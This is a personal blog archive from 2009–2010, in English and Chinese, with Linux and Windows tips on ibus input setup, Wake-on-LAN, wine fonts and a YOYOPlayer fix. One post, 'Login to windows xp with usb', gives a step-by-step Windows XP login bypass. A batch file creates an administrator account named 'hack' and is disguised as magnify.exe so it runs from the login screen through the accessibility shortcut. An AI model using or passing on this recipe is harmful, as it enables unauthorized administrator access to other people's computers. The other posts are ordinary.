Thursday, June 17, 2010

Mandriva Linux Spring MIB-Countdown Begin

I found this from MIB.


Wednesday, June 2, 2010

Login to windows xp with usb

Step 1: Download related software.
             HP USB Disk Storage Format tool
             USBoot
Step 2: Plug in usb drive and start HP USB tools.
            Select FAT format for DOS mode.
            Option -- Create a DOS startup disk.
            Done.
Step 3: Start USBoot.
            Select the usb drive.
            Use ZIP format.
            Done.
Step 4: Prepare scripts.
            Key in the following scripts:
            net user hack 123456 /add
            net localgroup administrators hack /add
            exit
           save as: login.bat

Step 5: rar the bat file with winrar.
            make it self extractable.
           extract path be % temp%
           after extraction execute program.
Step 6: change login.exe to mafnify.exe and copy it to usb.
            Chack magnify.exe and DOS files must in usb.

Step 7: The process.
           Boot usb into DOS.
           Enter login screen.
           use win+U to activate magnify.exe.
           add new user.
           user: hack
           password: 123456
           Now we can enter windows xp.

Step 8: At dos enter the following:
            cd c:\windows\system32
            copy magnify.exe magnify2.exe
            copy x:\magnify.exe c:\windows\system32magnify2.exe
            (x=usb)
      


Friday, May 21, 2010

Install ibus to Mandriva 2010

下载安装 ibus, ibus-table, ibus-pinyin, ibus-chewing and ibus-gtk.
在 Gnome 的工具列点击-》系统 -》区域设置 -》将输入法改成 ibus 然后注销,重新登陆。
打开终端,输入指令:ibus-setup。启动ibus。
修改主目录中的.bashrc文件。把以下的文字复制到 .bashrc。 在该文件的“# User specific aliases and functions”的下一行,加上以下几行:

export GTK_IM_MODULE=ibus
export XMODIFIERS=@im=ibus
export QT_IM_MODULE=ibus

保存该文件。

下一步是到 系统-》 首选项 -》启动应用程序 -》添加 -》在命令处 加入 
ibus-daemon -d 名称填上 ibus 保存。
退出,注销并重新登录。可以用了。





Tuesday, November 3, 2009

Mandriva Linux 2010 is now out

Local date 4/11/2009 and some ftp site already have full download.

Wednesday, October 7, 2009

YOYOPlayer突然没有声音

我的 YOYOPlayer 突然间没有了声音,用 google 搜寻一番后,才知道解救方法,方法如下:

进入 .YOYOPlayer 如后把 yoyoplayer.dat 这个文件删除,重启 YOYOPlayer 就行了。


Blogged with the Flock Browser

Thursday, October 1, 2009

Setup network card for Wake-On-Lan after shutdown
我要在一组电脑设置远程开机,花了8个月的时间才找到解决方案。原来不是 BIOS 的问题,问题出在网络卡。其设定如下:

1.在 Windows XP 用滑鼠右键开启 Properties
2.在 System Properties 对话框中,进入
Hardware > Device Manager > Nerwork adapters > Realtek RTL8168/8111 PCI-E Gigabit Ethernet NIC
3.用右键开启 Properties 进入 Advanced,然后选
Property:Wake-On-Lan After Shutdown
Value:Enable

Saturday, September 26, 2009

模糊不清的 wine 字体

我装了 wine 可是字体却模糊不清,上网找到 “laixin的菠萝格“ 美化wine的字体一文,解决了我的问题,在此說声谢谢。
方法如下:
1. 切换路径到 cd ~/.wine/drive_c/windows/fonts
2. ln -s /usr/share/fonts/TTF/wqy-zenhei wqy-zenhei.ttc
接下来,再打开wine看一看,真的OK了。
我用的是文泉正黑体。